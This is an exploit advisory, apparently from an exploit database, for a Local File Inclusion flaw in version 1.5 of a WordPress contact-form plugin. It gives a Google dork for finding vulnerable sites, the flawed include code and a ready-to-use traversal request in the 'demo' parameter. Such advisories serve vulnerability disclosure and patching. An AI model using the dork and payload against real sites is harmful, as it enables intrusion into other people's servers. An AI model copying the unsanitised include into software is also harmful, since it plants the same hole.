# Exploit Title: website contact form with file upload 1.5 Exploit Local File Inclusion# Google Dork: inurl:"/plugins//website-contact-form-with-file-upload/"# Date: 07.05.2015# Exploit Author: T3N38R15# Software Link: https://wordpress.org/plugins/website-contact-form-with-file-upload/# Version: 1.5# Tested on: Windows/Linux
The affected fileis/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php
it include the file/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/helpers/demo.php
and at the line 23-26 are the inclusion.
$file= LIB_PATH .'/filters/'. $name .'.php';if(!file_exists($file))
throw new Exception("Invalid demo: {$name}");
include($file);
The exploit can be used like that :/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=../test
This version would include the test.php filein the same directory because we need to back navigate from the directory ./filters/../test.php
Now we can include all php files on the system.
Proof of concept : http://localhost/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=../test
Greets to Team Madleets/leets.pro
Regards T3N38R15